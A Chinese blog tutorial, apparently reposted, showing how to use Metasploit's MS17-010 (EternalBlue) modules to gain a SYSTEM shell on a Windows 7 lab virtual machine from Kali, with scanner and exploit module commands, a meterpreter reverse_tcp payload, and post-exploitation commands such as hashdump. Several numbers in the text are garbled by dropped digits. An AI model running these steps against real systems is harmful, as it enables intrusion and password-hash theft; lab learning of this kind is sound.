您现在的位置是:首页 > 编程 > 

Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机

2025-07-19 13:40:51
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间 一、Metasploit(MSF)简介 Metasploit与200年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带

声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间

一、Metasploit(MSF)简介

Metasploit与200年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁。

Metasploit主要包含以下几个模块:

1.辅助模块(Auxiliary): 主要用于渗透信息收集,提供了多种漏洞的详细信息

2.漏洞渗透模块(exploits): 也叫攻击模块,利用已知的安全漏洞对远程目标系统的漏洞进行攻击

.攻击荷载模块(payload): 成功入侵计算机后运行的一段可执行的代码

4.后渗透模块(Post): 进一步收集被攻击的目标系统的各种信息

5.编码模块(encoders): 通过对payload进行各种编码来绕过一些防御系统或防御软件的检测

二、永恒之蓝简介

永恒之蓝(Eternal Blue)是一种利用windows的系统的SMB协议漏洞来获取系统最高权限,从而达到入侵计算机目地的漏洞,于2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布,5月12日被不法分子改造成了wannacry病毒,使全世界大范围内遭受了该病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。

*SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP19端口和TCP445端口。

三、渗透攻击过程

*实验环境

虚拟机VMware15

攻击机:Kali_linux2020版    IP地址:192.168.122.14  

靶机: windows7 x64      IP地址:192.168.122.12

*两台虚拟机均以AT方式连接,win7以关闭防火墙,可以互相ping通

*tips:担心损伤虚拟机重新配置安装很麻烦的话记得给虚拟机拍个快照哦

IP地址展示:

win7防火墙已关闭

两台虚机机之间的ping测试

实战操作步骤

首先在kali中开启postgresql数据库(kali中默认自带)

service postgresql start     //开启postgresql数据库
service postgresql status    //查看postgresql数据库运行状态,Actice那一栏显示active则成功开启,如下图

此时可以按 q 键退出查看数据库状态

这里解释一下为什么要开启postgresql数据库,这是因为msf工具需要利用postgresql数据库记录渗透扫描结果和信息

然后初始化一下msfdb数据库,它提示我需要root权限,所以我这里切换了一下root权限

看到两个黄的感叹号说明初始化成功

然后开启msf,直接输入命令

或者在左上角的应用程序中到漏洞利用工具,效果是一样的

这个时候我们成功进入了msf并且看到了一些相关信息,例如我们的msf是5.0.87的版本

其中由2006个攻击模块,1096个辅助模块,4个后渗透模块,562个攻击荷载模块等等

然后我们检查一下数据库的状态,看到是已经成功连接

这里我们简单介绍一下模块信息的查看,已经了解的话可以跳过,例如你可以用show exploits命令查看exploits模块,因为模块太多,需要等待一会

我这里一共到了两千多个exploits模块信息,他们的名命格式是 操作系统/服务/名称

例如这个第0条,记录的是aix操作系统下的localf服务的ibstat_path漏洞,disclosure表示它的发布时间,rank表示它的好用级别(manual一般,excellent优秀,good良好,average平均),最后的description是描述

然后我们继续渗透

首先搜索永恒之蓝模块

auxiliary表示辅助模块,exploit表示攻击模块,我们先用辅助模块对靶机进行目标收集,看其是否存在漏洞,这里快捷选择直接用use

然后我们用opti查看参数,后面required表示是否需要设置,我们只需要设置yes的选项,但是可以看到,其中的端口(rport),进程(threads)等选项已经有默认值,我们这里只需要设置rhost(目标地址)

然后我们run,根据第一行回显信息可知,目标主机很可能存在ms17_010漏洞(永恒之蓝)

然后我们利用攻击模块对其展开攻击

可以看到,我们仍然只需要设置rhosts,然后我们run或者exploit都可以

但我们看到win时,我们就攻击成功了

这个时候我们直接进入了shell,可以看到我们已经拿下了win7系统的最高权限

我们也可以查看win7的IP地址,中文字符出现了乱码的话可能要在kali上调整一下编码方式,不过还是可以看到ipv4地址与虚拟机中的一致

至此,我们拿到了目标靶机的最高权限,后面的大家就可以自己玩了,如果还有什么疑惑,欢迎留言评论或私信

!还是那句话,大家自己搭靶机玩玩就行了,切勿用于非法用途

下面是一些补充内容

*MSF基本攻击流程

这里是附加信息,已经了解的可以跳过

1.扫描靶机,检测靶机上的漏洞,选择相应的模块,例如使用ms17_010进行攻击,use auxiliary/scanner/smb/smb_ms17_010

检查并设置相应的参数,例如set rhosts 192.168.1.1

.攻击靶机,run/exploit

4.选择payload,set payload windows/x64/meterpreter/reverse_tcp

5.攻击,run/exploit

*其他攻击命令

获取hash密码:meterpreter>hashdump

查看用户权限:meterpreter>getuid

获取屏幕截图:meterpreter>screenshot

获取shell:meterpreter>shell

 

参考资料

https:///qq_4145285/article/details/9704009

https:///wwl01245/article/details/89421881

感谢上述博主的优秀博文

#感谢您对电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格的认可,转载请说明来源于"电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格

本文地址:http://www.dnpztj.cn/biancheng/1141550.html

相关标签:无
上传时间: 2025-07-19 07:30:40
留言与评论(共有 14 条评论)
本站网友 维纳斯皮具怎么样
19分钟前 发表
通过对payload进行各种编码来绕过一些防御系统或防御软件的检测 二
本站网友 人民币对港币的汇率
25分钟前 发表
进一步收集被攻击的目标系统的各种信息 5.编码模块(encoders)
本站网友 市场行情
26分钟前 发表
请求/响应协议,通过SMB协议可以在计算机间共享文件
本站网友 北京新浪二手房
17分钟前 发表
主要用于渗透信息收集,提供了多种漏洞的详细信息 2.漏洞渗透模块(exploits)
本站网友 江门商铺出租
12分钟前 发表
政府等机构,只能通过支付高额的赎金才能恢复出文件
本站网友 桂林力源集团
13分钟前 发表
渗透攻击过程 *实验环境 虚拟机VMware15 攻击机:Kali_linux2020版    IP地址:192.168.122.14   靶机: windows7 x64      IP地址:192.168.122.12 *两台虚拟机均以AT方式连接,win7以关闭防火墙,可以互相ping通 *tips
本站网友 南京汽车站网上订票
14分钟前 发表
///wwl01245/article/details/89421881 感谢上述博主的优秀博文
本站网友 淮南婚纱摄影
3分钟前 发表
也叫攻击模块,利用已知的安全漏洞对远程目标系统的漏洞进行攻击 .攻击荷载模块(payload)
本站网友 电狐手机电影转换器
1分钟前 发表
///wwl01245/article/details/89421881 感谢上述博主的优秀博文
本站网友 打虎亲兄弟
14分钟前 发表
Metasploit(MSF)简介 Metasploit与200年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁
本站网友 生机谷
9分钟前 发表
主要用于渗透信息收集,提供了多种漏洞的详细信息 2.漏洞渗透模块(exploits)
本站网友 夜郎社区
21分钟前 发表
///qq_4145285/article/details/9704009 https
本站网友 27gan
10分钟前 发表
Metasploit主要包含以下几个模块: 1.辅助模块(Auxiliary)